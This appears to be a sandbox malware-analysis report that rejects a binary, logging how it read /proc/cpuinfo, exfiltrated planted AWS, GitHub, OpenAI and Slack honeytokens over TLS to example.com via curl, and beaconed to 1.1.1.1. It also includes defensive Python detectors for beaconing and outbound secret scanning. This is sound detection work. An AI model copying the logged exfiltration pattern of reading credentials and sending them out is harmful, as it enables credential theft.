REJECT
8 high-severity findings, including exfiltration of planted honeytokens over TLS, which this report treats as unambiguous evidence of malicious behavior.
High Findings
sandbox_detection — HIGH
Process "target" (pid 26442) read /proc/cpuinfo, the usual source of CPU model and hypervisor brand strings (QEMU / VirtualBox / VMware) that VM-detection code looks for. Sandbox-detection probes are a strong indicator of evasive behavior: well-behaved software rarely needs to know whether it is running in a VM or container. On its own a single read is a weak signal (runtime libraries read /proc/cpuinfo for CPU feature flags); it counts here because another process of the same target binary (pid 26446) went on to exfiltrate a planted key.
2026-04-29T02:55:58Z open comm=target pid=26442 filename=/proc/cpuinfo
honeytoken_hit — HIGH
Process "curl" (pid 26450) produced a tls_write event whose payload contained the value of the planted honeytoken AWS_ACCESS_KEY_ID (a fake AWS access key written to /root/.aws/credentials). The token was planted by app-audit at sandbox start and has no legitimate reason to appear anywhere outside its seed location, let alone in outbound traffic.
tls_write comm=curl data="POST / HTTP/1.1\r\nHost: example.com\r\n...aws_access_key_id=AKIAIOSFODNN7EXAMPLE..."
honeytoken_hit — HIGH
Process "curl" (pid 26450) exfiltrated the planted AWS_SECRET_ACCESS_KEY via TLS POST to example.com. The secret key was planted in /root/.aws/credentials and has no legitimate reason to appear in outbound traffic.
tls_write comm=curl data="POST / HTTP/1.1\r\nHost: example.com\r\n...aws_secret_access_key=wJalrXUtnFEMI/K7MDENG..."
honeytoken_hit — HIGH
Process "curl" (pid 26452) exfiltrated the planted GITHUB_TOKEN via Authorization header to example.com.
tls_write comm=curl data="GET / HTTP/1.1\r\nHost: example.com\r\nAuthorization: Bearer ghp_6744e41dfb9e84a7\r\n\r\n"
honeytoken_hit — HIGH
Process "target" (pid 26446) exfiltrated the planted OPENAI_API_KEY in the body of an HTTPS POST made by the Go binary itself rather than by curl. The key was planted as an environment variable, so the process read its own environment and sent the value out.
tls_write comm=target data="..{\"api_key\":\"sk-proj-0eabbf61f1a8f77d\"}"
beaconing — HIGH
Process "curl" connected to 1.1.1.1:443 at least 4 times with regular spacing (mean interval 261ms, coefficient of variation 0.05). Regular-interval outbound connections are the classic C2 callback fingerprint. Caveat: four connections 261ms apart is a short window, and a tight retry loop against a public resolver (1.1.1.1 is Cloudflare's) would look the same, so on its own this would warrant closer inspection rather than rejection; here it accompanies confirmed honeytoken exfiltration.
connect comm=curl pid=26459 dst=1.1.1.1:443 interval=261ms cv=0.05
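The arithmetic behind the beaconing finding, as an added example written for this report and not app-audit's own detector code: connect events are grouped by (comm, dst), the gaps between consecutive connections are measured, and a destination is flagged once it has at least MIN_CONNECTS connections whose gaps have a coefficient of variation (stddev / mean) under CV_THRESHOLD. The event layout, the thresholds and the sample events are assumptions; the curl rows imitate the 1.1.1.1:443 callbacks above and the target rows are deliberately irregular.

```python
"""Regular-interval (beaconing) check over constructed connect events.

Added example, not app-audit's own code. Thresholds and event layout are
assumptions made for this illustration.
"""
from collections import defaultdict
from datetime import datetime, timezone
from statistics import mean, pstdev

MIN_CONNECTS = 4      # assumed: fewer samples make the cv meaningless
CV_THRESHOLD = 0.10   # assumed: the 0.05 in the finding is well under this

# Constructed events (timestamp, comm, dst). The curl rows imitate the
# 1.1.1.1:443 callbacks in the finding; the target rows are irregular.
SAMPLE_EVENTS = [
    ("2026-04-29T02:55:58.000Z", "curl", "1.1.1.1:443"),
    ("2026-04-29T02:55:58.261Z", "curl", "1.1.1.1:443"),
    ("2026-04-29T02:55:58.525Z", "curl", "1.1.1.1:443"),
    ("2026-04-29T02:55:58.780Z", "curl", "1.1.1.1:443"),
    ("2026-04-29T02:55:59.045Z", "curl", "1.1.1.1:443"),
    ("2026-04-29T02:55:58.100Z", "target", "104.20.23.154:443"),
    ("2026-04-29T02:55:58.900Z", "target", "104.20.23.154:443"),
    ("2026-04-29T02:55:59.050Z", "target", "104.20.23.154:443"),
    ("2026-04-29T02:56:00.400Z", "target", "104.20.23.154:443"),
]


def parse_ts(s):
    """Parse the ISO 8601 UTC timestamps used in the constructed events."""
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S.%fZ").replace(tzinfo=timezone.utc)


def interval_stats(timestamps):
    """Return (mean_interval_ms, cv) for a set of timestamps, or None when
    there are fewer than two gaps (a cv over one gap says nothing)."""
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() * 1000.0 for a, b in zip(ts, ts[1:])]
    if len(gaps) < 2:
        return None
    m = mean(gaps)
    if m <= 0:
        return None
    return m, pstdev(gaps) / m


def detect_beaconing(events, min_connects=MIN_CONNECTS, cv_threshold=CV_THRESHOLD):
    """Return one finding dict per (comm, dst) pair whose connections are
    both frequent enough and regularly spaced."""
    by_key = defaultdict(list)
    for ts, comm, dst in events:
        by_key[(comm, dst)].append(parse_ts(ts))
    findings = []
    for (comm, dst), stamps in by_key.items():
        if len(stamps) < min_connects:
            continue
        stats = interval_stats(stamps)
        if stats is None:
            continue
        mean_ms, cv = stats
        if cv < cv_threshold:
            findings.append({
                "comm": comm,
                "dst": dst,
                "count": len(stamps),
                "mean_interval_ms": round(mean_ms),
                "cv": round(cv, 3),
            })
    return findings


if __name__ == "__main__":
    for f in detect_beaconing(SAMPLE_EVENTS):
        print(f"beaconing HIGH comm={f['comm']} dst={f['dst']} n={f['count']} "
              f"interval={f['mean_interval_ms']}ms cv={f['cv']}")
```

The target rows have four connections too, so they pass the count gate, but their gaps (800ms, 150ms, 1350ms) give a cv well above the threshold and they are not flagged; that is the distinction the count alone cannot make.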
honeytoken_hit — HIGH
Process "curl" (pid 26461) exfiltrated the planted SLACK_BOT_TOKEN via TLS POST to example.com.
tls_write comm=curl data="POST / HTTP/1.1\r\nHost: example.com\r\n...slack_token=xoxb-6d99d9b64e1bbca7"
pii_outbound — HIGH
Process "target" (pid 26446) sent a payload containing a Luhn-valid 16-digit sequence (last 4: 4242) alongside a CVC field. Caveat: 4242 4242 4242 4242 is the most widely published test card number (Stripe's documentation uses it), so this may be test fixture data rather than real cardholder data. Confirm whether the vendor's stated data flows include payment-card data at all, and if so whether this destination is the declared payment processor.
tls_write comm=target data="..{\"card\":\"4242424242424242\",\"cvc\":\"123\"}"
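The honeytoken_hit and pii_outbound findings above both come from scanning outbound tls_write payloads. The following is an added example of that scan, written for this report and not app-audit's own detector code. The token values are constructed (only the prefixes visible in the findings are taken from the report; the rest is filler), the sample payloads are constructed, and matching the URL-encoded and base64 forms of each token is an assumption about how an exfiltrating tool might wrap a secret. Card numbers are reported by their last four digits only, so the report never carries a full PAN.

```python
"""Outbound-payload scanner for planted honeytokens and Luhn-valid PANs.

Added example, not app-audit's own code. Token values and payloads are
constructed for this illustration.
"""
import base64
import re
from urllib.parse import quote

# Constructed values: prefixes match the report's findings, remainders are filler.
HONEYTOKENS = {
    "AWS_ACCESS_KEY_ID": "AKIAIOSFODNN7EXAMPLE",
    "AWS_SECRET_ACCESS_KEY": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
    "GITHUB_TOKEN": "ghp_6744e41dfb9e84a7",
    "OPENAI_API_KEY": "sk-proj-0eabbf61f1a8f77d",
    "SLACK_BOT_TOKEN": "xoxb-6d99d9b64e1bbca7",
}

# A run of exactly 16 digits not adjacent to other digits (the finding's case).
PAN_RE = re.compile(r"(?<!\d)(\d{16})(?!\d)")

# Constructed payloads imitating the tls_write events in the findings.
SAMPLE_PAYLOADS = [
    "POST / HTTP/1.1\r\nHost: example.com\r\n\r\n"
    "aws_access_key_id=AKIAIOSFODNN7EXAMPLE"
    "&aws_secret_access_key=wJalrXUtnFEMI%2FK7MDENG%2FbPxRfiCYEXAMPLEKEY",
    "GET / HTTP/1.1\r\nHost: example.com\r\n"
    "Authorization: Bearer ghp_6744e41dfb9e84a7\r\n\r\n",
    '{"card":"4242424242424242","cvc":"123","order":"1234567812345678"}',
    '{"blob":"' + base64.b64encode(b"sk-proj-0eabbf61f1a8f77d").decode() + '"}',
]


def luhn_valid(digits):
    """Luhn checksum: double every second digit from the right, subtract 9
    from any result above 9, sum everything, and require a multiple of 10."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def token_forms(value):
    """Raw value plus the two encodings a payload most often wraps a secret in.
    base64 is matched only at its own alignment (token encoded by itself), so a
    token buried inside a larger base64 blob at another offset is missed."""
    return {
        "raw": value,
        "urlencoded": quote(value, safe=""),
        "base64": base64.b64encode(value.encode()).decode(),
    }


def scan_payload(data, honeytokens=HONEYTOKENS):
    """Return findings for one payload: honeytoken hits (one per token, with
    the form that matched) and Luhn-valid PANs reduced to their last four."""
    findings = []
    for name, value in honeytokens.items():
        for form, needle in token_forms(value).items():
            if needle in data:
                findings.append({"type": "honeytoken_hit", "token": name, "form": form})
                break  # one finding per token per payload
    for m in PAN_RE.finditer(data):
        pan = m.group(1)
        if luhn_valid(pan):
            findings.append({"type": "pii_outbound", "last4": pan[-4:]})
    return findings


def scan_all(payloads, honeytokens=HONEYTOKENS):
    """Scan every payload; returns a list of (index, findings)."""
    return [(i, scan_payload(p, honeytokens)) for i, p in enumerate(payloads)]


if __name__ == "__main__":
    for i, found in scan_all(SAMPLE_PAYLOADS):
        for f in found:
            print(f"payload[{i}] {f}")
```

The third payload also carries "1234567812345678", a 16-digit run that fails Luhn and is therefore not reported; the check is what separates a card number from an order ID or timestamp of the same length.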
Network Destinations
| Destination | ASN | Country | First seen by |
|---|---|---|---|
| 192.168.65.7:53 | - | - | tracer |
| 104.20.23.154:443 | AS13335 CLOUDFLARENET | US | curl |
| 172.66.147.243:443 | AS13335 CLOUDFLARENET | US | curl |
| 1.1.1.1:443 | AS13335 CLOUDFLARENET | AU | curl |
Process Activity Summary
| Process | High | Medium | Low | Info | Total |
|---|---|---|---|---|---|
| curl | 5 | 13 | 0 | 5 | 23 |
| target | 3 | 3 | 0 | 0 | 6 |
| tracer | 0 | 0 | 0 | 5 | 5 |
Honeytokens Planted (18)
| Token | Location |
|---|---|
| AWS_ACCESS_KEY_ID | /root/.aws/credentials |
| AWS_SECRET_ACCESS_KEY | /root/.aws/credentials |
| SSH_PRIVATE_KEY | /root/.ssh/id_rsa |
| SENSITIVE_DOC | customer_pii.txt |
| GITHUB_TOKEN | env var |
| OPENAI_API_KEY | env var |
| ANTHROPIC_API_KEY | env var |
| STRIPE_API_KEY | env var |
| SLACK_BOT_TOKEN | env var |
| SLACK_WEBHOOK | app config |
| TWILIO_SID | env var |
| TWILIO_AUTH | env var |
| CLOUDFLARE_TOKEN | env var |
| JWT_TOKEN | app config |
| CHROME_COOKIES | Chrome Default/ |
| FIREFOX_COOKIES | Firefox profile |
| BTC_WALLET | wallet.dat |
| PG_PASSWORD | /root/.pgpass |
Chain of Custody
| Field | Value |
|---|---|
| Run ID | d6ba21f9-8aac-403c-aec7-bd6b86a5a9c3 |
| Generated at | 2026-04-29T02:56:00Z |
| Tracer version | v1-rc16 |
| Go version | go1.22.12 |
| Host OS / arch | linux / arm64 |
| Target SHA-256 | 2147f8215423f518bf582ab422b0322b67b6909a5bb31d602c19c1c433459aaa |
| Target size | 7,077,384 bytes |
| Manifest SHA-256 | 2f8cacee317e63660f78eb20551cf706302e9ff943250648ecbd6efcfd20ce08 |
| Honeytokens planted | 18 |
| Detectors run | 11 |